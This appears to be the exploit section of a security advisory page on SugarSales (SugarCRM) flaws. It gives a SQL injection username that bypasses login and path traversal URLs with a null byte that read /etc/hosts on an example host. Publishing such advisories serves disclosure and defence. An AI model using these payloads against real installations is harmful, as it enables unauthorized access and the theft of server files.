• info
• discussion
• exploit
• solution
• references

SugarSales Multiple Remote Vulnerabilities

Example URIs sufficient to exploit these vulnerabilities have been provided:

To log into SugarSales, utilize the username "admin' or 1=1 -- " with any password.

To disclose the contents of potentially sensitive files:
http://www.example.com/sugarcrm/modules/Users/Login.php?theme=/../../../etc/hosts%00
http://www.example.com/sugarcrm/modules/Calls/index.php?theme=/../../../etc/hosts%00